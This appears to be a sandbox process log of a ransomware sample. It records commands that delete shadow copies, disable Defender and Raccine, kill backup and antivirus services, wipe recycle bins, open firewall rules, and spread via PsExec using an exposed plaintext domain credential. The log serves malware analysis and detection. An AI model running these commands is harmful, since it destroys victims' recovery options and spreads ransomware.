  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5264
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5696
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4484
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4968
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4832
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5568
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4176
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:4884
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  PID:4708
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4768
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:5388
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:5460
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:6084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:5728
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:4288
- C:\Users\Admin\AppData\Local\Temp\lkvf3rwq.exe
  "C:\Users\Admin\AppData\Local\Temp\lkvf3rwq.exe" \10.10.0.24 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
  2⤵
  PID:5740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5628
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5196
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:6084
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4448
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4220
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:4980
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:5412
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:5364
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:6060
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
  2⤵
  PID:5236
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:4136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:5640
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop BackupExecJobEngine /y
  2⤵
  PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:5696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:5932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:5164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:5924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:5380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:5988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:5976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:5964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:5724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:5492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
  2⤵
  PID:1460

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:5124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5328

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:5220

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:5504

C:\Windows\PAExec-4788-RJMQBVDN.exe
C:\Windows\PAExec-4788-RJMQBVDN.exe -service
1⤵
PID:1272
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:5420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:6008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:5608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:5564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:2420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:4276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4100
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:4992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5904
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:5308
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:2184
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:6052
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:3464
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:1584
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:5348
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:1444
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5796
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5128
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:5852
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4892
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5272
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:2888
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:4144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:1092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5400
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:4356
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:5184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5704
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:1008
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:1380
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:4808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:4736
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:3108
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:4876
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:5564
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:996
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:5164
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:3464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5812
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:3956
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4824
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:4212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:4452
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:2084
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:4412
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2768
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:5476
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    PID:732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:4664
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4564
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    PID:5028
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4720
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:5808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:4732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    PID:5900
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:4160
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    PID:4984
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5580
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:2024
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4408
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:5316
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:4316
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:4184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:4224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:4140
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:376
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:5792
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:6124
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    PID:5228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    PID:5200
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    PID:4784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    - Kills process with taskkill
    PID:5248
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    - Kills process with taskkill
    PID:5784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    - Kills process with taskkill
    PID:5788
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    PID:5232
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:5444
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    PID:4816
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    - Kills process with taskkill
    PID:5176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:3432
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4580
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5492
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5656
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /C C:\Windows\TEMP\tmpD802.bat
    3⤵
    PID:5520
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:4944
  - - C:\Windows\system32\find.exe
      find "}\"
      4⤵
      PID:4544
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
      4⤵
      PID:4236
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      Suspicious use of AdjustPrivilegeToken
      PID:4180
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
      4⤵
      PID:4732
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:1376
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
      4⤵
      PID:5300
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5628
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4796
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:6080
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5824
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:5608
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5444
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:1272
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5044
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5536
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5960
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5476
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5236
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4068
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4700

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:5644
- C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  "714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:4368
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4000
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:3108
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:4616
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4980
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:4708
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5812
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    PID:6008
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:5592
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:4136
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:6108
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:4192
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4684
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5112
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:5960
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    PID:4572
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:1092
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:2456
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:3864
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:2508
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:2636
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:5148
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5252
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:5004
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    PID:5896
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
